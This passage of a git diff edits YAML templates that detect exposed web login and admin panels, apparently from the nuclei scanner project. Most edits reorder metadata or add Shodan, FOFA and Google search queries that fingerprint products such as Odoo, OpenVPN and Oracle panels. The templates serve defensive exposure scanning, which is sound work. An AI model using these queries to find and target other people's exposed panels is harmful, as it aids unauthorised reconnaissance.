nsq,admin,panel,exposure http: diff --git a/http/exposed-panels/nuxeo-platform-panel.yaml b/http/exposed-panels/nuxeo-platform-panel.yaml index c4c52499a8..c85557eb25 100644 --- a/http/exposed-panels/nuxeo-platform-panel.yaml +++ b/http/exposed-panels/nuxeo-platform-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Nuxeo Platform" - verified: true tags: panel,nuxeo http: diff --git a/http/exposed-panels/nzbget-panel.yaml b/http/exposed-panels/nzbget-panel.yaml index 547d74dc37..91b3924797 100644 --- a/http/exposed-panels/nzbget-panel.yaml +++ b/http/exposed-panels/nzbget-panel.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:nzbget:nzbget:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: nzbget - shodan-query: html:"NZBGet" - vendor: nzbget verified: true + max-request: 1 + vendor: nzbget + product: nzbget + shodan-query: + - html:"NZBGet" + - http.html:"nzbget" + fofa-query: body="nzbget" tags: panel,nzbget http: diff --git a/http/exposed-panels/o2-easy-panel.yaml b/http/exposed-panels/o2-easy-panel.yaml index eca156b9d7..fd9af7d682 100644 --- a/http/exposed-panels/o2-easy-panel.yaml +++ b/http/exposed-panels/o2-easy-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"O2 Easy Setup" - verified: true tags: panel,o2,easy,iot,router http: diff --git a/http/exposed-panels/ocomon-panel.yaml b/http/exposed-panels/ocomon-panel.yaml index c98a952b9f..386a875530 100644 --- a/http/exposed-panels/ocomon-panel.yaml +++ b/http/exposed-panels/ocomon-panel.yaml @@ -12,11 +12,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:ocomon_project:ocomon:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: ocomon - shodan-query: http.html:"OcoMon" - vendor: ocomon_project verified: true + max-request: 1 + vendor: ocomon_project + product: ocomon + shodan-query: + - http.html:"OcoMon" + - http.html:"ocomon" + fofa-query: body="ocomon" tags: panel,ocomon,oss,ocomon_project http: diff --git a/http/exposed-panels/ocs-inventory-login.yaml b/http/exposed-panels/ocs-inventory-login.yaml index e1294b35c5..37fc467a36 100644 --- a/http/exposed-panels/ocs-inventory-login.yaml +++ b/http/exposed-panels/ocs-inventory-login.yaml @@ -9,10 +9,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="OCS Inventory" + verified: true max-request: 2 shodan-query: title:"OCS Inventory" - verified: true + fofa-query: title="OCS Inventory" tags: ocs-inventory,panel http: diff --git a/http/exposed-panels/octoprint-login.yaml b/http/exposed-panels/octoprint-login.yaml index d99e3d02c2..a6ad7c5757 100644 --- a/http/exposed-panels/octoprint-login.yaml +++ b/http/exposed-panels/octoprint-login.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:octoprint:octoprint:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: octoprint vendor: octoprint + product: octoprint tags: octoprint,panel http: diff --git a/http/exposed-panels/odoo-database-manager.yaml b/http/exposed-panels/odoo-database-manager.yaml index 0107811c52..e5b2df0adb 100644 --- a/http/exposed-panels/odoo-database-manager.yaml +++ b/http/exposed-panels/odoo-database-manager.yaml @@ -8,11 +8,16 @@ info: classification: cpe: cpe:2.3:a:odoo:odoo:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: odoo - shodan-query: title:"Odoo" - vendor: odoo verified: true + max-request: 1 + vendor: odoo + product: odoo + shodan-query: + - title:"Odoo" + - http.title:"odoo" + - cpe:"cpe:2.3:a:odoo:odoo" + fofa-query: title="odoo" + google-query: intitle:"odoo" tags: panel,odoo,backup http: diff --git a/http/exposed-panels/odoo-panel.yaml b/http/exposed-panels/odoo-panel.yaml index 401ea9b455..5f87431fda 100644 --- a/http/exposed-panels/odoo-panel.yaml +++ b/http/exposed-panels/odoo-panel.yaml @@ -7,11 +7,16 @@ info: classification: cpe: cpe:2.3:a:odoo:odoo:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: odoo - shodan-query: title:"Odoo" - vendor: odoo verified: true + max-request: 2 + vendor: odoo + product: odoo + shodan-query: + - title:"Odoo" + - http.title:"odoo" + - cpe:"cpe:2.3:a:odoo:odoo" + fofa-query: title="odoo" + google-query: intitle:"odoo" tags: login,panel,odoo http: diff --git a/http/exposed-panels/office-webapps-panel.yaml b/http/exposed-panels/office-webapps-panel.yaml index 70bf654553..49d407c4aa 100644 --- a/http/exposed-panels/office-webapps-panel.yaml +++ b/http/exposed-panels/office-webapps-panel.yaml @@ -12,11 +12,14 @@ info: cwe-id: CWE-668 cpe: cpe:2.3:a:microsoft:office_web_apps_server:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: office_web_apps_server - shodan-query: html:"Provide a link that opens Word" - vendor: microsoft verified: true + max-request: 2 + vendor: microsoft + product: office_web_apps_server + shodan-query: + - html:"Provide a link that opens Word" + - http.html:"provide a link that opens word" + fofa-query: body="provide a link that opens word" tags: panel,office-webapps,login,microsoft http: diff --git a/http/exposed-panels/officekeeper-admin-login.yaml b/http/exposed-panels/officekeeper-admin-login.yaml index aa0d9d3b66..68e39c8451 100644 --- a/http/exposed-panels/officekeeper-admin-login.yaml +++ b/http/exposed-panels/officekeeper-admin-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:-800060828 - verified: true tags: officekeeper,dlp,panel http: diff --git a/http/exposed-panels/oipm-detect.yaml b/http/exposed-panels/oipm-detect.yaml index 45aa8f0861..9731116b71 100644 --- a/http/exposed-panels/oipm-detect.yaml +++ b/http/exposed-panels/oipm-detect.yaml @@ -5,16 +5,16 @@ info: author: nodauf severity: info description: One Identity Password Manager is a secure password manager that gives enterprises control over password management, policies, and automated reset functions. + remediation: Ensure proper access. reference: - https://www.oneidentity.com/techbrief/security-guide-for-password-manager821177/ - remediation: Ensure proper access. classification: cwe-id: CWE-200 cpe: cpe:2.3:a:oneidentity:password_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: password_manager vendor: oneidentity + product: password_manager tags: panel,oneidentity http: diff --git a/http/exposed-panels/olt-web-interface.yaml b/http/exposed-panels/olt-web-interface.yaml index 00908dc3b3..5b9c39153d 100644 --- a/http/exposed-panels/olt-web-interface.yaml +++ b/http/exposed-panels/olt-web-interface.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"OLT Web Management Interface" - verified: true tags: edb,panel,olt http: diff --git a/http/exposed-panels/omniampx-panel.yaml b/http/exposed-panels/omniampx-panel.yaml index a85d6826eb..8e03c543cf 100644 --- a/http/exposed-panels/omniampx-panel.yaml +++ b/http/exposed-panels/omniampx-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"Omnia MPX" - verified: true tags: panel,omnia,omniampx http: diff --git a/http/exposed-panels/onlyoffice-login-panel.yaml b/http/exposed-panels/onlyoffice-login-panel.yaml index 02193adf05..0c8d7fa744 100644 --- a/http/exposed-panels/onlyoffice-login-panel.yaml +++ b/http/exposed-panels/onlyoffice-login-panel.yaml @@ -9,11 +9,13 @@ info: classification: cpe: cpe:2.3:a:onlyoffice:onlyoffice:*:*:*:*:*:*:*:* metadata: - fofa-query: app="ONLYOFFICE" && (icon_hash="1928933157" || icon_hash="826083956" || icon_hash="-1380930248" || icon_hash="-285544629" || icon_hash="812741391") - max-request: 2 - product: onlyoffice - vendor: onlyoffice verified: true + max-request: 2 + vendor: onlyoffice + product: onlyoffice + fofa-query: + - app="ONLYOFFICE" && (icon_hash="1928933157" || icon_hash="826083956" || icon_hash="-1380930248" || icon_hash="-285544629" || icon_hash="812741391") + - app="onlyoffice" && (icon_hash="1928933157" || icon_hash="826083956" || icon_hash="-1380930248" || icon_hash="-285544629" || icon_hash="812741391") tags: panel,onlyoffice,detect http: diff --git a/http/exposed-panels/open-stack-dashboard-login.yaml b/http/exposed-panels/open-stack-dashboard-login.yaml index 97e3553a22..eea83a37ab 100644 --- a/http/exposed-panels/open-stack-dashboard-login.yaml +++ b/http/exposed-panels/open-stack-dashboard-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:openstack:horizon:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: horizon vendor: openstack + product: horizon tags: panel,openstack,edb http: diff --git a/http/exposed-panels/open-virtualization-manager-panel.yaml b/http/exposed-panels/open-virtualization-manager-panel.yaml index 5a379e5aa8..a3802f7d5d 100644 --- a/http/exposed-panels/open-virtualization-manager-panel.yaml +++ b/http/exposed-panels/open-virtualization-manager-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-668 metadata: - google-query: intitle:"Ovirt-Engine" max-request: 2 shodan-query: title:"Ovirt-Engine" + google-query: intitle:"Ovirt-Engine" tags: panel,ovirt,oss http: diff --git a/http/exposed-panels/openam-panel.yaml b/http/exposed-panels/openam-panel.yaml index e127120b14..436d7cb379 100644 --- a/http/exposed-panels/openam-panel.yaml +++ b/http/exposed-panels/openam-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:forgerock:openam:*:*:*:*:*:*:*:* metadata: max-request: 20 - product: openam - shodan-query: http.title:"OpenAM" vendor: forgerock + product: openam + shodan-query: + - http.title:"OpenAM" + - http.title:"openam" + fofa-query: title="openam" + google-query: intitle:"openam" tags: panel,openam,opensso,login,forgerock http: diff --git a/http/exposed-panels/openbullet2-panel.yaml b/http/exposed-panels/openbullet2-panel.yaml index 5a91a23619..c5e63ad541 100644 --- a/http/exposed-panels/openbullet2-panel.yaml +++ b/http/exposed-panels/openbullet2-panel.yaml @@ -9,9 +9,9 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N metadata: + verified: "true" max-request: 1 shodan-query: http.favicon.hash:-1264095219 - verified: "true" tags: openbullet,panel,login http: diff --git a/http/exposed-panels/opencart-panel.yaml b/http/exposed-panels/opencart-panel.yaml index 47f378633d..4d7e03b75f 100644 --- a/http/exposed-panels/opencart-panel.yaml +++ b/http/exposed-panels/opencart-panel.yaml @@ -13,11 +13,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:opencart:opencart:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: opencart - shodan-query: html:"OpenCart" - vendor: opencart verified: true + max-request: 2 + vendor: opencart + product: opencart + shodan-query: + - html:"OpenCart" + - http.html:"opencart" + - cpe:"cpe:2.3:a:opencart:opencart" + fofa-query: body="opencart" tags: panel,opencart http: diff --git a/http/exposed-panels/opencats-panel.yaml b/http/exposed-panels/opencats-panel.yaml index 821f0df3ea..038051f445 100644 --- a/http/exposed-panels/opencats-panel.yaml +++ b/http/exposed-panels/opencats-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:opencats:opencats:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: opencats - shodan-query: title:"opencats" - vendor: opencats verified: true + max-request: 2 + vendor: opencats + product: opencats + shodan-query: + - title:"opencats" + - http.title:"opencats" + fofa-query: title="opencats" + google-query: intitle:"opencats" tags: panel,opencats http: diff --git a/http/exposed-panels/openemr-detect.yaml b/http/exposed-panels/openemr-detect.yaml index b74f7c5519..60a0ec54a8 100644 --- a/http/exposed-panels/openemr-detect.yaml +++ b/http/exposed-panels/openemr-detect.yaml @@ -10,11 +10,21 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: - fofa-query: app="OpenEMR" max-request: 1 - product: openemr - shodan-query: http.html:"OpenEMR" vendor: open-emr + product: openemr + shodan-query: + - http.html:"OpenEMR" + - http.html:"openemr" + - http.title:"openemr" + - http.favicon.hash:1971268439 + fofa-query: + - app="OpenEMR" + - body="openemr" + - title="openemr" + - app="openemr" + - icon_hash=1971268439 + google-query: intitle:"openemr" tags: panel,openemr,open-emr http: diff --git a/http/exposed-panels/openerp-database.yaml b/http/exposed-panels/openerp-database.yaml index 15b3cf9a71..0f21421401 100644 --- a/http/exposed-panels/openerp-database.yaml +++ b/http/exposed-panels/openerp-database.yaml @@ -11,8 +11,13 @@ info: cpe: cpe:2.3:a:odoo:odoo:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: odoo vendor: odoo + product: odoo + shodan-query: + - http.title:"odoo" + - cpe:"cpe:2.3:a:odoo:odoo" + fofa-query: title="odoo" + google-query: intitle:"odoo" tags: openerp,panel,odoo http: diff --git a/http/exposed-panels/openfire-admin-panel.yaml b/http/exposed-panels/openfire-admin-panel.yaml index b50f092600..14ffd89398 100644 --- a/http/exposed-panels/openfire-admin-panel.yaml +++ b/http/exposed-panels/openfire-admin-panel.yaml @@ -10,11 +10,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: openfire - shodan-query: http.title:"Openfire Admin Console" - vendor: igniterealtime verified: true + max-request: 2 + vendor: igniterealtime + product: openfire + shodan-query: + - http.title:"Openfire Admin Console" + - http.title:"openfire" + - http.title:"openfire admin console" + fofa-query: + - title="openfire" + - title="openfire admin console" + google-query: + - intitle:"openfire admin console" + - intitle:"openfire" tags: panel,openfire,admin,console,igniterealtime http: diff --git a/http/exposed-panels/opengear-panel.yaml b/http/exposed-panels/opengear-panel.yaml index 6cd156b4a8..a09021d32c 100644 --- a/http/exposed-panels/opengear-panel.yaml +++ b/http/exposed-panels/opengear-panel.yaml @@ -10,10 +10,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true + max-request: 1 fofa-query: app="opengear-Management-Console" google-query: intitle:"Opengear Management Console" - max-request: 1 - verified: true tags: panel,opengear http: diff --git a/http/exposed-panels/opennebula-panel.yaml b/http/exposed-panels/opennebula-panel.yaml index 4daec8781b..02dafdbc83 100644 --- a/http/exposed-panels/opennebula-panel.yaml +++ b/http/exposed-panels/opennebula-panel.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"opennebula" - verified: true tags: panel,opennebula,cloud http: diff --git a/http/exposed-panels/opennms-web-console.yaml b/http/exposed-panels/opennms-web-console.yaml index b82544a167..226a9b0529 100644 --- a/http/exposed-panels/opennms-web-console.yaml +++ b/http/exposed-panels/opennms-web-console.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:opennms:opennms:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: opennms vendor: opennms + product: opennms tags: panel,login,edb,opennms http: diff --git a/http/exposed-panels/opensis-panel.yaml b/http/exposed-panels/opensis-panel.yaml index 33455476e0..09e3667be0 100644 --- a/http/exposed-panels/opensis-panel.yaml +++ b/http/exposed-panels/opensis-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:os4ed:opensis:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: opensis - shodan-query: http.title:"openSIS" vendor: os4ed + product: opensis + shodan-query: + - http.title:"openSIS" + - http.title:"opensis" + fofa-query: title="opensis" + google-query: intitle:"opensis" tags: panel,opensis,login,os4ed http: diff --git a/http/exposed-panels/opentouch-multimediaservices-panel.yaml b/http/exposed-panels/opentouch-multimediaservices-panel.yaml index 924c7b80f5..471db9f2f1 100644 --- a/http/exposed-panels/opentouch-multimediaservices-panel.yaml +++ b/http/exposed-panels/opentouch-multimediaservices-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.al-enterprise.com/-/media/assets/internet/documents/opentouch-multimedia-services-datasheet-en.pdf metadata: - max-request: 2 verified: true + max-request: 2 tags: panel,opentouch,login,detect http: diff --git a/http/exposed-panels/openvas-panel.yaml b/http/exposed-panels/openvas-panel.yaml index b9ee0bb264..b92ace7112 100644 --- a/http/exposed-panels/openvas-panel.yaml +++ b/http/exposed-panels/openvas-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://openvas.org/ metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1606029165 - verified: true tags: panel,openvas,admin,login http: diff --git a/http/exposed-panels/openvpn-admin.yaml b/http/exposed-panels/openvpn-admin.yaml index 56b4ab95c7..7973f1fa5c 100644 --- a/http/exposed-panels/openvpn-admin.yaml +++ b/http/exposed-panels/openvpn-admin.yaml @@ -10,11 +10,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:openvpn:openvpn:*:*:*:*:*:*:*:* metadata: - max-request: 3 - product: openvpn - shodan-query: http.title:"OpenVPN-Admin" - vendor: openvpn verified: true + max-request: 3 + vendor: openvpn + product: openvpn + shodan-query: + - http.title:"OpenVPN-Admin" + - http.html:"router management - server openvpn" + - http.title:"openvpn-admin" + - cpe:"cpe:2.3:a:openvpn:openvpn" + fofa-query: + - body="router management - server openvpn" + - title="openvpn-admin" + google-query: intitle:"openvpn-admin" tags: panel,openvpn,admin,config http: diff --git a/http/exposed-panels/openvpn-connect.yaml b/http/exposed-panels/openvpn-connect.yaml index b98fa64c01..9d32b9c222 100644 --- a/http/exposed-panels/openvpn-connect.yaml +++ b/http/exposed-panels/openvpn-connect.yaml @@ -10,11 +10,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:openvpn:connect:*:*:*:*:macos:*:*:* metadata: + verified: true max-request: 1 + vendor: openvpn product: connect shodan-query: http.title:"openvpn connect" - vendor: openvpn - verified: true + fofa-query: title="openvpn connect" + google-query: intitle:"openvpn connect" tags: panel,openvpn,connect,vpn http: diff --git a/http/exposed-panels/openvpn-router-management.yaml b/http/exposed-panels/openvpn-router-management.yaml index cd56bf19da..76be02a066 100644 --- a/http/exposed-panels/openvpn-router-management.yaml +++ b/http/exposed-panels/openvpn-router-management.yaml @@ -10,11 +10,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:openvpn:openvpn:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: openvpn - shodan-query: http.html:"Router Management - Server OpenVPN" - vendor: openvpn verified: true + max-request: 1 + vendor: openvpn + product: openvpn + shodan-query: + - http.html:"Router Management - Server OpenVPN" + - http.html:"router management - server openvpn" + - http.title:"openvpn-admin" + - cpe:"cpe:2.3:a:openvpn:openvpn" + fofa-query: + - body="router management - server openvpn" + - title="openvpn-admin" + google-query: intitle:"openvpn-admin" tags: panel,openvpn,router http: diff --git a/http/exposed-panels/openvz-web-login.yaml b/http/exposed-panels/openvz-web-login.yaml index 6209ebeb92..8618716b75 100644 --- a/http/exposed-panels/openvz-web-login.yaml +++ b/http/exposed-panels/openvz-web-login.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-1898583197 - verified: true tags: panel,openvz http: diff --git a/http/exposed-panels/openwebui-panel.yaml b/http/exposed-panels/openwebui-panel.yaml index 2d0e3c48b8..718b5fa5be 100644 --- a/http/exposed-panels/openwebui-panel.yaml +++ b/http/exposed-panels/openwebui-panel.yaml @@ -1,19 +1,19 @@ id: openwebui-panel -info: - name: Openweb UI Panel - Detect - author: rxerium - severity: info - description: | - An OpenWebUI panel was detected - reference: - - https://openwebui.com/ - metadata: - shodan-query: http.favicon.hash:-286484075 - verified: true - max-request: 1 - tags: panel,openwebui,login - +info: + name: Openweb UI Panel - Detect + author: rxerium + severity: info + description: | + An OpenWebUI panel was detected + reference: + - https://openwebui.com/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-286484075 + tags: panel,openwebui,login + http: - method: GET path: diff --git a/http/exposed-panels/openwrt-login.yaml b/http/exposed-panels/openwrt-login.yaml index 5e382c6e0a..e6630d1c9a 100644 --- a/http/exposed-panels/openwrt-login.yaml +++ b/http/exposed-panels/openwrt-login.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:o:openwrt:openwrt:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: openwrt - shodan-query: http.title:"OpenWrt - LuCI" vendor: openwrt + product: openwrt + shodan-query: + - http.title:"OpenWrt - LuCI" + - http.title:"openwrt - luci" + fofa-query: title="openwrt - luci" + google-query: intitle:"openwrt - luci" tags: openwrt,router,panel http: diff --git a/http/exposed-panels/openwrt/openwrt-luci-panel.yaml b/http/exposed-panels/openwrt/openwrt-luci-panel.yaml index 028980bfc7..a8a0927243 100644 --- a/http/exposed-panels/openwrt/openwrt-luci-panel.yaml +++ b/http/exposed-panels/openwrt/openwrt-luci-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:x-wrt:luci:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: luci - shodan-query: http.title:"OpenWrt - LuCI" vendor: x-wrt + product: luci + shodan-query: + - http.title:"OpenWrt - LuCI" + - http.title:"openwrt - luci" + fofa-query: title="openwrt - luci" + google-query: intitle:"openwrt - luci" tags: panel,default-login,openwrt,x-wrt http: diff --git a/http/exposed-panels/openx-panel.yaml b/http/exposed-panels/openx-panel.yaml index 87e35cb694..9a9b174f01 100644 --- a/http/exposed-panels/openx-panel.yaml +++ b/http/exposed-panels/openx-panel.yaml @@ -12,11 +12,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: revive_adserver - shodan-query: title:"Revive Adserver" - vendor: revive-adserver verified: true + max-request: 2 + vendor: revive-adserver + product: revive_adserver + shodan-query: + - title:"Revive Adserver" + - http.title:"revive adserver" + - http.favicon.hash:106844876 + fofa-query: + - icon_hash=106844876 + - title="revive adserver" + google-query: intitle:"revive adserver" tags: panel,openx,revive,adserver,login,revive-adserver http: diff --git a/http/exposed-panels/opinio-panel.yaml b/http/exposed-panels/opinio-panel.yaml index fcfbed532f..09e6e415fc 100644 --- a/http/exposed-panels/opinio-panel.yaml +++ b/http/exposed-panels/opinio-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.objectplanet.com/opinio/ metadata: + verified: true max-request: 2 shodan-query: http.title:"Opinio" - verified: true tags: panel,opinio,login,detect http: diff --git a/http/exposed-panels/oracle-access-management.yaml b/http/exposed-panels/oracle-access-management.yaml index 93c67194c6..6bb460dbd8 100644 --- a/http/exposed-panels/oracle-access-management.yaml +++ b/http/exposed-panels/oracle-access-management.yaml @@ -1,22 +1,30 @@ id: oracle-access-management -info: - name: Oracle Access Management Login Panel - Detect - author: righettod - severity: info - description: Oracle Access Management login panel was detected. - reference: - - https://www.oracle.com/security/identity-management/access-management/ - classification: - cpe: cpe:2.3:a:oracle:access_manager:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - shodan-query: http.title:"Oracle Access Management" - fofa-query: title="Oracle Access Management" - vendor: oracle - tags: panel,oracle,login,detect - +info: + name: Oracle Access Management Login Panel - Detect + author: righettod + severity: info + description: Oracle Access Management login panel was detected. + reference: + - https://www.oracle.com/security/identity-management/access-management/ + classification: + cpe: cpe:2.3:a:oracle:access_manager:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: oracle + product: access_manager + shodan-query: + - "http.title:\"Oracle Access Management\"" + - http.title:"oracle access management" + - http.html:"/oam/pages/css/login_page.css" + fofa-query: + - "title=\"Oracle Access Management\"" + - title="oracle access management" + - body="/oam/pages/css/login_page.css" + google-query: intitle:"oracle access management" + tags: panel,oracle,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/oracle-business-control.yaml b/http/exposed-panels/oracle-business-control.yaml index 4c75837dae..93f4061ee4 100644 --- a/http/exposed-panels/oracle-business-control.yaml +++ b/http/exposed-panels/oracle-business-control.yaml @@ -12,10 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:oracle:commerce:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: commerce - shodan-query: http.title:"Oracle Commerce" + max-request: 2 vendor: oracle + product: commerce + shodan-query: + - "http.title:\"Oracle Commerce\"" + - http.title:"oracle commerce" + - cpe:"cpe:2.3:a:oracle:commerce" + fofa-query: title="oracle commerce" + google-query: intitle:"oracle commerce" tags: oracle,login,panel http: diff --git a/http/exposed-panels/oracle-business-intelligence.yaml b/http/exposed-panels/oracle-business-intelligence.yaml index 5efc63b867..62d377fc07 100644 --- a/http/exposed-panels/oracle-business-intelligence.yaml +++ b/http/exposed-panels/oracle-business-intelligence.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:oracle:business_intelligence:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: business_intelligence - shodan-query: http.title:"Oracle Business Intelligence Sign In" - vendor: oracle verified: true + max-request: 3 + vendor: oracle + product: "business_intelligence" + shodan-query: + - "http.title:\"Oracle Business Intelligence Sign In\"" + - http.title:"oracle business intelligence sign in" + fofa-query: title="oracle business intelligence sign in" + google-query: intitle:"oracle business intelligence sign in" tags: panel,oracle,login,detect http: diff --git a/http/exposed-panels/oracle-ebusiness-panel.yaml b/http/exposed-panels/oracle-ebusiness-panel.yaml index 648172e2b0..a3784e7416 100644 --- a/http/exposed-panels/oracle-ebusiness-panel.yaml +++ b/http/exposed-panels/oracle-ebusiness-panel.yaml @@ -1,19 +1,19 @@ id: oracle-ebusiness-panel -info: - name: Oracle E-Business Suite Login Panel - Detect - author: righettod - severity: info - description: | - Oracle E-Business Suite login panel was detected. - reference: - - https://www.oracle.com/applications/ebusiness/ - metadata: - max-request: 1 - verified: true - shodan-query: http.html:"Oracle UIX" - tags: panel,oracle,login,detect - +info: + name: Oracle E-Business Suite Login Panel - Detect + author: righettod + severity: info + description: | + Oracle E-Business Suite login panel was detected. + reference: + - https://www.oracle.com/applications/ebusiness/ + metadata: + verified: true + max-request: 1 + shodan-query: http.html:"Oracle UIX" + tags: panel,oracle,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/oracle-enterprise-manager-login.yaml b/http/exposed-panels/oracle-enterprise-manager-login.yaml index fada237b4f..f429b34a0c 100644 --- a/http/exposed-panels/oracle-enterprise-manager-login.yaml +++ b/http/exposed-panels/oracle-enterprise-manager-login.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:oracle:enterprise_manager_base_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: enterprise_manager_base_platform vendor: oracle + product: enterprise_manager_base_platform tags: panel,oracle,manager,login http: diff --git a/http/exposed-panels/oracle-opera-login.yaml b/http/exposed-panels/oracle-opera-login.yaml index a7e758cb87..2192be78cb 100644 --- a/http/exposed-panels/oracle-opera-login.yaml +++ b/http/exposed-panels/oracle-opera-login.yaml @@ -7,9 +7,9 @@ info: classification: cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: title:"Oracle Opera" && html:"/OperaLogin/Welcome.do" - verified: true tags: panel,opera,oracle,detect http: diff --git a/http/exposed-panels/oracle-people-enterprise.yaml b/http/exposed-panels/oracle-people-enterprise.yaml index 8f412d914d..62758d1d96 100644 --- a/http/exposed-panels/oracle-people-enterprise.yaml +++ b/http/exposed-panels/oracle-people-enterprise.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:oracle:peoplesoft_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: peoplesoft_enterprise - shodan-query: http.title:"Oracle Peoplesoft Enterprise" vendor: oracle + product: peoplesoft_enterprise + shodan-query: + - http.title:"Oracle Peoplesoft Enterprise" + - http.title:"oracle peoplesoft enterprise" + fofa-query: title="oracle peoplesoft enterprise" + google-query: intitle:"oracle peoplesoft enterprise" tags: oracle,login,panel http: diff --git a/http/exposed-panels/oracle-peoplesoft-panel.yaml b/http/exposed-panels/oracle-peoplesoft-panel.yaml index 27836986ac..07e915ebdd 100644 --- a/http/exposed-panels/oracle-peoplesoft-panel.yaml +++ b/http/exposed-panels/oracle-peoplesoft-panel.yaml @@ -12,9 +12,9 @@ info: cwe-id: CWE-200 metadata: verified: true - max-request: 7 - shodan-query: http.title:"Oracle PeopleSoft Sign-in" - fofa-query: title="Oracle PeopleSoft Sign-in" + max-request: 12 + shodan-query: "http.title:\"Oracle PeopleSoft Sign-in\"" + fofa-query: "title=\"Oracle PeopleSoft Sign-in\"" tags: oracle,peoplesoft,panel,login,detect http: diff --git a/http/exposed-panels/orchid-vms-panel.yaml b/http/exposed-panels/orchid-vms-panel.yaml index d5ba591ace..fa796a3712 100644 --- a/http/exposed-panels/orchid-vms-panel.yaml +++ b/http/exposed-panels/orchid-vms-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: orchid_core_vms - shodan-query: http.title:"Orchid Core VMS" vendor: ipconfigure + product: orchid_core_vms + 